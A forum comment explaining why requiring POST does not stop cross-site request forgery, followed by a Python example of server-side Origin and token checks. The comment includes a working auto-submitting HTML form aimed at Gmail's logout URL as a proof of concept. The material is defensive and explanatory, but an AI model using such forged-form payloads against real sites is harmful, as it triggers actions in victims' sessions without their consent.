
That doesn't solve it because the attacker can just create a <form> and auto-submit it with JS (or make a translucent submit button that is the size of the entire page if you have JS disabled).


For example:

    <body onload="javascript:document.evil.submit()">
      <form name="evil" method="POST" action="https://mail.google.com/mail/u/0/?logout">
      </form>
    </body>
The massive button is left as an exercise to the reader ;-)
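The comment above shows why a "POST only" rule is no defence: the victim's browser attaches the session cookie to the auto-submitted cross-site form just as it would to a legitimate one. The following is an added example (not code from the comment or from the site it mentions) modelling the server-side decision a state-changing endpoint such as a logout handler should make instead: check that the request's Origin (or Referer) is our own origin, and require a per-session synchronizer token that an attacker's page cannot read. The `Request` class, the `SITE_ORIGIN` value, the session store and the sample requests are all constructed for illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Assumption: the application's own origin (constructed, not from the post).
SITE_ORIGIN = "https://mail.example.com"


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as the server sees it."""
    method: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


def issue_csrf_token(session_store: dict, sid: str) -> str:
    """Mint a per-session token; only same-origin pages can read it."""
    token = secrets.token_urlsafe(32)
    session_store[sid] = token
    return token


def method_is_post(req: Request) -> bool:
    """The 'just require POST' rule the comment defeats."""
    return req.method == "POST"


def origin_matches(req: Request) -> bool:
    """Reject unless Origin (or, failing that, Referer) is our own origin."""
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if not source:
        return False  # no provenance at all: fail closed
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE_ORIGIN


def token_matches(req: Request, session_store: dict) -> bool:
    """Synchronizer token: the form value must equal the one bound to the session cookie."""
    expected = session_store.get(req.cookies.get("sid", ""))
    supplied = req.form.get("csrf_token", "")
    if not expected or not supplied:
        return False
    # Constant-time comparison; encode so non-ASCII input cannot raise.
    return hmac.compare_digest(expected.encode(), supplied.encode())


def accept_logout(req: Request, session_store: dict) -> bool:
    """Full decision: POST, same-origin provenance, and a valid token."""
    return (
        method_is_post(req)
        and origin_matches(req)
        and token_matches(req, session_store)
    )


# Constructed sample traffic.
SESSIONS: dict = {}
TOKEN = issue_csrf_token(SESSIONS, "sid-123")

# The browser attaches the victim's session cookie to both requests; that is
# exactly what the auto-submitted <form> in the comment relies on.
FORGED = Request(
    method="POST",
    headers={"Origin": "https://attacker.example"},
    form={},  # the attacker's page cannot read TOKEN, so it cannot send it
    cookies={"sid": "sid-123"},
)
LEGIT = Request(
    method="POST",
    headers={"Origin": SITE_ORIGIN},
    form={"csrf_token": TOKEN},
    cookies={"sid": "sid-123"},
)

if __name__ == "__main__":
    print("forged passes POST-only check:", method_is_post(FORGED))          # True
    print("forged accepted by full check:", accept_logout(FORGED, SESSIONS))  # False
    print("legit accepted by full check:", accept_logout(LEGIT, SESSIONS))    # True
```

Either check alone would already stop the forged request; both together cover the cases where one is unavailable (some clients strip Referer, and older browsers did not send Origin on form posts). Marking the session cookie `SameSite=Lax` or `Strict` adds a third, browser-enforced layer, since the cookie is then not attached to a cross-site POST at all.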